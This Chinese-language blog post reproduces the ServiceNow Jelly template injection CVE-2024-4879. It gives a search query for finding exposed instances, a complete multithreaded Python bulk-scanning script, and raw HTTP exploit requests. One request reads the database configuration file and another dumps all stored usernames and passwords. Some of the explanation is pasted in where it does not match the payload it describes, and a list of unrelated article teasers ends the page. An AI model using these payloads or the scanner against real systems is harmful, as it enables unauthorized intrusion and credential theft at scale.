【漏洞复现】ServiceNow UI Jelly模板注入(CVE-2024-4879)

        声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

ServiceNow是一家专注于提供企业级云计算服务的企业,其旗舰产品是基于云的服务管理解决方案,旨在协助各组织简化及自动化其业务流程。然而,该公司的Jelly模板和Glide表达式存在安全漏洞,这使得未经授权的攻击者有机会通过构建恶意请求来利用这些漏洞,进而实现远程代码的执行。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="ConditionalFocus.jsdbx"

2.使用poc批量扫描

# 导入所需库
import requests
import argparse
import threading
import queue
import os
from requests.exceptions import RequestException
from datetime import datetime
import urllib3
import signal
import sys# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# 定义颜色代码
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = '\033[33;1m'
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'# 显示横幅信息
def banner():print(f"""
{light_orange_color}                                                                      ______     _______     ____   ___ ____  _  _         _  _    ___ _____ ___  / ___\ \   / / ____|   |___ \ / _ \___ \| || |       | || |  ( _ )___  / _ \ 
| |    \ \ / /|  _| _____ __) | | | |__) ||| |_ _____||| |_ / _ \  / / (_) |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__   _| (_) |/ / \__, |\____|  \_/  |_____|   |_____|\___/_____|  |_|          |_|  \___//_/    /_/ {reset_color}-> Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability.{reset_color}
{reset_color}{dimmed_gray_color}-> By x.com/MohamedNab1l
{light_orange_color}-> Use Wisely.{reset_color}
""")# 日志目录和文件路径
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')# 创建日志目录
def create_log_dir():if not os.path.exists(LOG_DIR):os.makedirs(LOG_DIR)print_message('info', f"Log directory created: {LOG_DIR}")# 记录日志信息
def log_message(message):with open(LOG_FILE, 'a') as log_file:log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}")# 打印不同级别的消息
def print_message(level, message):if level == 'vulnerable':print(f"{cyan_color}[VLUN] {message}{reset_color}")if level == 'info':print(f"{dimmed_gray_color}[INFO] {message}{reset_color}")elif level == 'success':print(f"{green_color}[VLUN] {message}{reset_color}")elif level == 'warning':print(f"{honey_yellow_color}[WARNING] {message}{reset_color}")elif level == 'error':print(f"{red_color}[ERROR] {message}{reset_color}")log_message(message)# 需要检查的路径,包含漏洞利用代码
paths_to_check = "/login.do?jvar_page_title=<style><j:jelly xmlns:j=\"jelly\" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>"# 发起请求并获取响应内容
def make_request(url):try:response = requests.get(url, verify=False)if response.status_code == 200:return response.textelse:return Noneexcept requests.RequestException as e:return None# 测试目标URL是否受漏洞影响
def test_host(url):try:fullurl = f"{url}{paths_to_check}"body = make_request(fullurl)if body is not None and '>1337<' in body:print_message('vulnerable', f"Vulnerable: {url}")#print(body)else:print_message('warning', f"Not Vulnerable: {url}")except requests.RequestException as e:print_message('error', f"Timeout: {url}")# 工作线程函数,从队列中取出URL并测试其是否受漏洞影响
def worker(queue):while not queue.empty():url = queue.get()print_message('info', f"Testing {url}")test_host(url)queue.task_done()# 处理Ctrl+C信号,优雅退出程序
def signal_handler(sig, frame):print_message('error', 'You pressed Ctrl+C! Exiting gracefully.')sys.exit(0)# 主函数,解析命令行参数并执行相应的操作
def main():signal.signal(signal.SIGINT, signal_handler)banner()parser = argparse.ArgumentParser(description='Bulk scanning tool for ServiceNow CVE-2024-4879.')group = parser.add_mutually_exclusive_group(required=True)group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')args = parser.parse_args()create_log_dir()if args.url:print_message('info', f"Testing single target: {args.url}")test_host(args.url)elif args.file:with open(args.file, 'r') as f:urls = [line.strip() for line in f if line.strip()]print_message('info', f"Testing multiple targets from file: {args.file}")url_queue = queue.Queue()for url in urls:url_queue.put(url)threads = []for _ in range(10):t = threading.Thread(target=worker, args=(url_queue,))t.start()threads.append(t)for t in threads:t.join()print_message('info', "Scanning complete.")if __name__ == '__main__':main()

cmd运行:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(111*111);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

 2.读取数据库配置

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

3.查看用户名密码

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egr=new%20GlideRecord(%22sys_user%22);gr.query();s=%22%22;while(gr.next())s=s.concat(gr.user_name,%22%20:%20%22,gr.user_password,%22%3Cbr/%3E%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

2.数据包分析 

1.构造数据包

1. 请求行:`GET /login.do?

请求参数jvar_page_title的值经过URL编码,解码后为:

<style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gs.addErrorMessage(111*111);</g:evaluate></j:jelly></style>

这里是一个典型的服务器端模板注入(SSTI)攻击。攻击者尝试通过篡改请求参数来注入恶意代码。具体来说:

  • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  • gs.addErrorMessage(111*111);是Jelly脚本的一部分,它执行了一个乘法运算并将结果添加到错误消息中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

2.读取数据库配置

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:

    <style><j:jelly xmlns:j="jelly:core" xmlns:g="glide"><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

    这里是一个典型的服务器端模板注入(SSTI)攻击。

    • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
    • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
    • z=new Packages.java.io.File("").getAbsolutePath();获取当前工作目录的绝对路径。
    • z=z.substring(0,z.lastIndexOf("/"));从绝对路径中移除最后一个斜杠及其后面的部分,得到父目录的路径。
    • u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();尝试打开位于父目录下名为co..nf/glide.db.properties的文件,并创建一个BufferedReader对象来读取文件内容。
    • s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");逐行读取文件内容,并将其拼接到字符串s中,每行之间用换行符分隔。
    • gs.addErrorMessage(s);将读取到的文件内容作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.查看用户名密码

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:
  2. <style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
  3. 这里是一个典型的服务器端模板注入(SSTI)攻击。
  4. <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  5. <j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  6. gr=new GlideRecord("sys_user");创建一个名为sys_user的GlideRecord对象。
  7. gr.query();执行查询操作,获取所有用户记录。
  8. s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");遍历查询结果,并将用户名和密码拼接成一个字符串,每个用户的用户名和密码之间用冒号和换行符分隔。
  9. gs.addErrorMessage(s);将拼接好的字符串作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.结束跑路

1.构造数据包

2.构造数据包,读取数据库配置

3.查看用户名密码

每篇一言:要不断的移动像水一样,才不会变成死水一样,你要不断流动着!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/876426.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

视觉巡线小车(STM32+OpenMV)——总结

文章目录 目录 文章目录 前言 一、效果展示 二、完整流程 1、STM32CubeMX配置 2、Keil编辑 3、硬件接线 4、参数调试 5、图像处理调试 三、总结 前言 基于前面的系列文章&#xff0c;已基本介绍完了基于STM32OpenMV的视觉巡线小车&#xff0c;本文将以小编自己的小车…

SeaCMS海洋影视管理系统远程代码执行漏洞复现

SeaCMS海洋影视管理系统远程代码执行漏洞复现 Ⅰ、环境搭建Ⅱ、漏洞复现Ⅲ、漏洞分析 免责声明&#xff1a;请勿利用文章内的相关技术从事非法测试&#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#xff0c;均由使用者本人负责&…

Greenplum数据库中常用的聚合函数及其对应的分析函数

一、SUM()函数及其对应的分析函数&#xff08;SUM() OVER&#xff09; SUM()函数是一种常用的聚合函数&#xff0c;用于计算某一列的总和。在Greenplum数据库中&#xff0c;SUM()函数可以与分析函数SUM() OVER结合使用&#xff0c;实现对某一列的累计求和操作。 语法示例&…

全栈嵌入式C++、STM32、Modbus、FreeRTOS和MQTT协议:工业物联网(IIoT)可视化系统设计思路(附部分代码解析)

项目概述 随着工业4.0时代的到来&#xff0c;工业物联网&#xff08;IIoT&#xff09;在提高生产效率、降低运营成本和实现智能制造方面得到了广泛应用。本项目旨在开发一个全面的工业物联网监控系统&#xff0c;能够实时监测设备的温度、压力、振动和电流等参数&#xff0c;并…

【Python实战因果推断】60_随机实验与统计知识2

目录 An A/B Testing Example An A/B Testing Example 在许多公司中&#xff0c;一种常见的策略是提供廉价甚至免费的产品&#xff0c;这种产品本身可能并不盈利&#xff0c;但其目的是吸引新客户。一旦公司获得了这些客户&#xff0c;就可以向他们推销其他更盈利的产品&#x…

ThinkPHP一对一关联模型的运用(ORM)

一、序言 最近在写ThinkPHP关联模型的时候一些用法总忘&#xff0c;我就想通过写博客的方式复习和整理下一些用法。 具体版本&#xff1a; topthink/framework&#xff1a;6.1.4topthink/think-orm&#xff1a;2.0.61 二、实例应用 1、一对一关联 1.1、我先设计了两张表&#x…

Makefile 如何将生成的 .o 文件放到指定文件夹

研究了不少文章&#xff0c;我行通了一个&#xff0c;但是也不全&#xff0c;目前只能适用当前文件夹&#xff0c;如果源文件有子文件夹处理不了&#xff0c;还得继续研究。很多人说编译完把O文件移动走或者直接删掉。我想说的是不符合我的要求&#xff0c;移走或者删除O文件&a…

git使用报错 无法切换到master,因存在未提交的更改。 在切换分支之前提交或撤消更改。 有关详细信息,请查看“输出”窗口

"git使用报错 无法切换到master&#xff0c;因存在未提交的更改。 在切换分支之前提交或撤消更改。 有关详细信息&#xff0c;请查看“输出”窗口" 这个错误消息通常出现在你尝试切换Git分支时&#xff0c;当前工作目录中有未提交的更改。Git会阻止你切换分支&#…

Linux下的网络通讯

UDP&#xff1a;用户数据报协议 传输层 特点: 1.无连接 2.不安全、不可靠 3.面向报文 4.占用资源开销小 TCP : 传输控制协议 传输层 1. TCP特点: 1.面向连接 2.安全、可靠 3.面向字节流 4.占用资源开销大 三次握手: 指建立tc…

[SWPU2019]Web1

上来看到两个功能&#xff0c;登录和注册&#xff0c;看到登录框直接sqlmap嗦一下 失败 注册admin显示被注册&#xff0c;那就注册一个账密都为aaa 登录进来发现两个功能点 发了一个广告却显示代管理确认&#xff0c;这里肯定没有管理员&#xff0c;所以我们得想办法自己上去a…

lxml.etree模式使用(一)

from lxml import etree from copy import deepcopydef prettyprint(element, **kwargs):print("/")xml etree.tostring(element, pretty_printTrue, **kwargs)print(xml.decode(), end)# 1. 创建元素 root etree.Element("root")# 2. 添加子元素 root.a…

【Python】基础学习技能提升代码样例3:JSON文本处理

对json的处理&#xff0c;无非是编码和解码两部分 编码&#xff1a;将python数据结构转换为json字符串解码: 将json字符串转换为python数据结构 另外&#xff0c;还有.json文件的读写 一、编码 json.dumps(obj, *, skipkeysFalse, ensure_asciiTrue, check_circularTrue, a…

React特点

React 是一个用于构建用户界面的 JavaScript 库&#xff0c;由 Facebook 开发并维护。React 的特点主要体现在以下几个方面&#xff1a; 声明式&#xff08;Declarative&#xff09;&#xff1a;React 使你能够以一种声明的方式来描述你的 UI&#xff0c;这使得代码更加容易理解…

铲屎官的必备好物——希喂、352、米家养宠空气净化器分享

对于每一位深爱着家中萌宠的铲屎官而言&#xff0c;无尽的温情往往也伴随着日常生活中的小烦恼。那些不经意间飘散在空气中的毛发&#xff0c;偶尔缠绕在鼻腔或口腔中的细微触感&#xff0c;以及偶尔袭来的不明异味&#xff0c;都是与宠物共度的日子里不可或缺的一部分。幸好随…

聊聊RNNLSTM

RNN 用于解决输入数据为&#xff0c;序列到序列(时间序列)数据&#xff0c;不能在传统的前馈神经网络(FNN)很好应用的问题。时间序列数据是指在不同时间点上收集到的数据&#xff0c;这类数据反映了某一事物、现象等随时间的变化状态或程度&#xff0c;即输入内容的上下文关联…

基于Orangepi全志H616开发嵌入式数据库——SQLite

目录 一、SQLite数据库 1.1 SQLite 的特点&#xff1a; 1.2 SQLite 的使用场景&#xff1a; 1.3 SQLite数据库与传统MySQL数据库的区别&#xff1a; 二、SQLite数据库安装 2.1 SQLite数据库安装方式一&#xff1a; 2.2 SQlite数据库安装方式二&#xff1a; 三、SQLite数…

Nacos适配达梦数据库并制作镜像

背景&#xff1a;因项目需要信创&#xff0c;需将原本的mysql数据库&#xff0c;改成达梦数据库 一、部署达梦数据库 1.1 部署达梦数据库服务 可参考&#xff1a;Docker安装达梦数据库_达梦数据库docker镜像-CSDN博客 1.2 创建nacos数据库 create user SAFE_NACOS identifi…

MySQL 选择数据库

MySQL 选择数据库 在MySQL中,选择数据库是进行数据管理和操作的第一步。本文将详细介绍如何选择数据库,包括从命令行界面和图形用户界面(如MySQL Workbench)中选择数据库的方法。 1. 命令行界面中选择数据库 1.1 登录MySQL服务器 首先,您需要登录到MySQL服务器。打开命…

放大电路总结

补充: 只有直流移动时才有Rbe动态等效电阻 从RsUs看进去,实际上不管接了什么东西都能够看成是一个Ri(输入电阻) Ri Ui/Ii Rb//Rbe Ui/Us Ri/(RiRs) Aus (Uo/Ui)*(Ui/Us) Au *Ri/(RiRs) 当前面是一个电压源的信号 我们就需要输入电阻更大 Ro--->输出电阻--->将…

合并两个有序链表 - 力扣(LeetCode)C语言

21. 合并两个有序链表 - 力扣&#xff08;LeetCode&#xff09;( 点击前面链接即可查看题目) /*** Definition for singly-linked list.* struct ListNode {* int val;* struct ListNode *next;* };*/ struct ListNode* mergeTwoLists(struct ListNode* list1, struct…